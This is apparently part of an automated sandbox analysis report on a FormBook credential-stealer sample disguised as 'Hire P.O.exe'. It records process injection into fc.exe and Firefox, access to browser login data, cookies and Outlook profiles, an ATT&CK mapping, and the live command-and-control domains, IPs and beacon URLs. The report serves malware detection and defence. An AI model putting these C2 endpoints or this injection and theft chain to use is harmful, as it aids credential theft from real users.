                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtQueryVolumeInformationFile: Direct from: 0x76F12F2CJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtQuerySystemInformation: Direct from: 0x76F148CCJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtAllocateVirtualMemory: Direct from: 0x76F148ECJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtQueryAttributesFile: Direct from: 0x76F12E6CJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtReadVirtualMemory: Direct from: 0x76F12E8CJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtCreateKey: Direct from: 0x76F12C6CJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtSetInformationThread: Direct from: 0x76F12B4CJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtClose: Direct from: 0x76F12B6C
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtOpenKeyEx: Direct from: 0x76F13C9CJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtWriteVirtualMemory: Direct from: 0x76F1490CJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtCreateUserProcess: Direct from: 0x76F1371CJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtTerminateThread: Direct from: 0x76F12FCCJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtCreateFile: Direct from: 0x76F12FECJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtOpenFile: Direct from: 0x76F12DCCJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtQueryInformationToken: Direct from: 0x76F12CACJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtQueryValueKey: Direct from: 0x76F12BECJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtDeviceIoControlFile: Direct from: 0x76F12AECJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtSetInformationThread: Direct from: 0x76F063F9Jump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtOpenSection: Direct from: 0x76F12E0CJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtMapViewOfSection: Direct from: 0x76F12D1CJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtResumeThread: Direct from: 0x76F136ACJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtCreateMutant: Direct from: 0x76F135CCJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtWriteVirtualMemory: Direct from: 0x76F12E3CJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtNotifyChangeKey: Direct from: 0x76F13C2CJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtProtectVirtualMemory: Direct from: 0x76F07B2EJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtProtectVirtualMemory: Direct from: 0x76F12F9CJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtSetInformationProcess: Direct from: 0x76F12C5CJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtOpenKeyEx: Direct from: 0x76F12B9CJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtQueryInformationProcess: Direct from: 0x76F12C26Jump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtResumeThread: Direct from: 0x76F12FBCJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtDelayExecution: Direct from: 0x76F12DDCJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtReadFile: Direct from: 0x76F12ADCJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtQuerySystemInformation: Direct from: 0x76F12DFCJump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeNtAllocateVirtualMemory: Direct from: 0x76F12BFCJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\Hire P.O.exeMemory written: C:\Users\user\Desktop\Hire P.O.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\Hire P.O.exeSection loaded: NULL target: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeSection loaded: NULL target: C:\Windows\SysWOW64\fc.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\fc.exeThread register set: target process: 1212Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\fc.exeThread APC queued: target process: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeProcess created: C:\Users\user\Desktop\Hire P.O.exe "C:\Users\user\Desktop\Hire P.O.exe"Jump to behavior
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: zKwhguHavy.exe, 00000006.00000000.1786422892.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, zKwhguHavy.exe, 00000006.00000002.3140201922.0000000000E01000.00000002.00000001.00040000.00000000.sdmp, zKwhguHavy.exe, 0000000A.00000000.1941848313.0000000000E60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: zKwhguHavy.exe, 00000006.00000000.1786422892.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, zKwhguHavy.exe, 00000006.00000002.3140201922.0000000000E01000.00000002.00000001.00040000.00000000.sdmp, zKwhguHavy.exe, 0000000A.00000000.1941848313.0000000000E60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: zKwhguHavy.exe, 00000006.00000000.1786422892.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, zKwhguHavy.exe, 00000006.00000002.3140201922.0000000000E01000.00000002.00000001.00040000.00000000.sdmp, zKwhguHavy.exe, 0000000A.00000000.1941848313.0000000000E60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: zKwhguHavy.exe, 00000006.00000000.1786422892.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, zKwhguHavy.exe, 00000006.00000002.3140201922.0000000000E01000.00000002.00000001.00040000.00000000.sdmp, zKwhguHavy.exe, 0000000A.00000000.1941848313.0000000000E60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: yProgram Manager
                Source: C:\Users\user\Desktop\Hire P.O.exeQueries volume information: C:\Users\user\Desktop\Hire P.O.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Hire P.O.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.Hire P.O.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Hire P.O.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3142576469.0000000004C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3140780162.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3140728929.0000000000A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1863818446.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1865405800.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\fc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.Hire P.O.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Hire P.O.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3142576469.0000000004C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3140780162.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3140728929.0000000000A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1863818446.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1865405800.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS2
                File and Directory Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets113
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1556306 Sample: Hire P.O.exe Startdate: 15/11/2024 Architecture: WINDOWS Score: 100 31 www.tesetturhanzade.xyz 2->31 33 zz67x.top 2->33 35 12 other IPs or domains 2->35 45 Suricata IDS alerts for network traffic 2->45 47 Antivirus / Scanner detection for submitted sample 2->47 49 Multi AV Scanner detection for submitted file 2->49 53 5 other signatures 2->53 10 Hire P.O.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 31->51 process4 file5 29 C:\Users\user\AppData\...\Hire P.O.exe.log, ASCII 10->29 dropped 65 Injects a PE file into a foreign processes 10->65 14 Hire P.O.exe 10->14         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 17 zKwhguHavy.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 fc.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 zKwhguHavy.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 ultrawin23.shop 170.39.213.43, 49990, 49991, 49992 PETRONAS-BHD-AS-APPetroliamNasionalBerhadMY Reserved 23->37 39 www.deeplungatlas.org 194.9.94.86, 49986, 49987, 49988 LOOPIASE Sweden 23->39 41 6 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Hire P.O.exe58%ReversingLabsByteCode-MSIL.Ransomware.RedLine
                Hire P.O.exe100%AviraHEUR/AGEN.1311126
                Hire P.O.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.omnibizlux.biz/jlqg/?Ht=8ZwuH3XLrsgkZOwseHvalCxaOoZWL8Myt6ETjGRYvhbDeONq4p5sIs5njeSldqxqKZPhhBSXVHEE53Bztq1snIy3rHn2YPrXd4E8Hi4h+GYhtHJoWRtIl2c=&VRvXS=WfxxDba8X0%Avira URL Cloudsafe
                https://www.ultrawin23.shop/53y2/?Ht=t/JS3aCWZhQCYNrXnvgf0%Avira URL Cloudsafe
                http://www.ultrawin23.shop/53y2/?Ht=t/JS3aCWZhQCYNrXnvgf+Spfn+QwkJd9+ukIZkrf2wKhs0ak4EV/sNuml9GQ/gRnrRAuSs9LfWphueMxgO6yvh9yDCOMNYuNEmOK8YK5XL8j59+xTS7wZgA=&VRvXS=WfxxDba8X0%Avira URL Cloudsafe
                http://www.omnibizlux.biz/jlqg/0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/images/iOS-114.png0%Avira URL Cloudsafe
                http://www.vibixx.site/4xim/0%Avira URL Cloudsafe
                http://www.deeplungatlas.org/57zf/0%Avira URL Cloudsafe
                http://www.deeplungatlas.org/57zf/?Ht=RSXDvmZ18TUSGahlBulUTEWs/Fcq4D9Pe8zesMLeYybHc+55raQPDCyvNJ+XALungzCzmhokbhdOc6Bo/lmi6ITFfezPRUw2CIw7GC9Ov+fkwE2kIiBG9Hg=&VRvXS=WfxxDba8X0%Avira URL Cloudsafe
                https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/images/iOS-72.png0%Avira URL Cloudsafe
                http://www.zz67x.top/45n6/0%Avira URL Cloudsafe
                http://www.vibixx.site/4xim/?Ht=0a8PLTuVJQjPSrlSWcuFsyjhCtT3tUYocqBNWW0rXtqiQhjiqFhrPTN8PV80cHIUHvAO/w81MYBbJGISUqP2+eiOObBwEQMzrW97hoYkmxyo0/quMuclnrI=&VRvXS=WfxxDba8X0%Avira URL Cloudsafe
                http://www.sonoscan.org/ew98/0%Avira URL Cloudsafe
                https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking0%Avira URL Cloudsafe
                http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut0%Avira URL Cloudsafe
                http://www.ultrawin23.shop/53y2/0%Avira URL Cloudsafe
                https://static.loopia.se/shared/logo/logo-loopia-white.svg0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/images/iOS-57.png0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/styles/reset.css0%Avira URL Cloudsafe
                https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe0%Avira URL Cloudsafe
                http://www.kantinestoel.online/ggvc/?VRvXS=WfxxDba8X&Ht=8JknlPcTs2UijknPxbO2oXM1DVs+MaDJyzfKPy/xZKvt3f8uoA3Cr57APZQOM8ic8BRlU5XE22T0HXZ7ivS1sK6ZXv4UHMlnEy7R+vzIZHc2JfvRSKbgShg=0%Avira URL Cloudsafe
                http://www.vibixx.site0%Avira URL Cloudsafe
                https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw0%Avira URL Cloudsafe
                https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
                http://www.zz67x.top/45n6/?VRvXS=WfxxDba8X&Ht=djThxhCXsVTaW29IStONWe6xHREL7sfT17x4FrONtsEdvh3lUnzIZnalbCLaN+V127dkaLgcrePaRgDcNiYylWN2xRdIuk3ZdTLMRFf+/Hm0bLjKb/7io/E=0%Avira URL Cloudsafe
                http://www.kantinestoel.online/ggvc/0%Avira URL Cloudsafe
                https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
                http://www.tesetturhanzade.xyz/ur0f/?Ht=zogJdywBU1O1LleNfuKvTdvFae130slE6VGlZ0lHVZSYlVhh6xxrlMSZfTqXcXU1qXLRjwj9DFcRyKew14ZiOLfy4lE5d8KH961FjyGPsNNV+mrO2nqMYXA=&VRvXS=WfxxDba8X0%Avira URL Cloudsafe
                https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
                https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin0%Avira URL Cloudsafe
                https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
                https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb0%Avira URL Cloudsafe
                http://www.sonoscan.org/ew98/?Ht=DRp8qVXu3DttXwSjdKhWcEeMlFq8C+hogWxSvfZ4d/ir/4GJO1kBPGKjrfOH+I9HTBbwMxIq6OZmA+t0U8cpmRDvWvsjjx3B4XGnqR7Idwi9xFOqzFZTxLg=&VRvXS=WfxxDba8X0%Avira URL Cloudsafe
                https://static.loopia.se/shared/images/additional-pages-hero-shape.webp0%Avira URL Cloudsafe
                https://static.loopia.se/shared/style/2022-extra-pages.css0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.vibixx.site
                		162.0.211.143
                		truetrue
                  		unknown
                  zz67x.top
                  		38.47.232.194
                  		truetrue
                    		unknown
                    www.sonoscan.org
                    		13.248.169.48
                    		truefalse
                      		high
                      www.deeplungatlas.org
                      		194.9.94.86
                      		truetrue
                        		unknown
                        ultrawin23.shop
                        		170.39.213.43
                        		truetrue
                          		unknown
                          natroredirect.natrocdn.com
                          		85.159.66.93
                          		truefalse
                            		high
                            kantinestoel.online
                            		91.184.0.200
                            		truetrue
                              		unknown
                              www.omnibizlux.biz
                              		167.172.133.32
                              		truefalse
                                		high
                                www.ultrawin23.shop
                                		unknown
                                		unknownfalse
                                  		unknown
                                  www.zz67x.top
                                  		unknown
                                  		unknownfalse
                                    		unknown
                                    www.tangible.online
                                    		unknown
                                    		unknownfalse
                                      		unknown
                                      www.tesetturhanzade.xyz
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.kantinestoel.online
                                        		unknown
                                        		unknownfalse
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          http://www.deeplungatlas.org/57zf/?Ht=RSXDvmZ18TUSGahlBulUTEWs/Fcq4D9Pe8zesMLeYybHc+55raQPDCyvNJ+XALungzCzmhokbhdOc6Bo/lmi6ITFfezPRUw2CIw7GC9Ov+fkwE2kIiBG9Hg=&VRvXS=WfxxDba8Xtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.ultrawin23.shop/53y2/?Ht=t/JS3aCWZhQCYNrXnvgf+Spfn+QwkJd9+ukIZkrf2wKhs0ak4EV/sNuml9GQ/gRnrRAuSs9LfWphueMxgO6yvh9yDCOMNYuNEmOK8YK5XL8j59+xTS7wZgA=&VRvXS=WfxxDba8Xtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.deeplungatlas.org/57zf/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.omnibizlux.biz/jlqg/?Ht=8ZwuH3XLrsgkZOwseHvalCxaOoZWL8Myt6ETjGRYvhbDeONq4p5sIs5njeSldqxqKZPhhBSXVHEE53Bztq1snIy3rHn2YPrXd4E8Hi4h+GYhtHJoWRtIl2c=&VRvXS=WfxxDba8Xtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.vibixx.site/4xim/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.omnibizlux.biz/jlqg/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.zz67x.top/45n6/true
                                          • Avira URL Cloud: safe
                                          		unknown
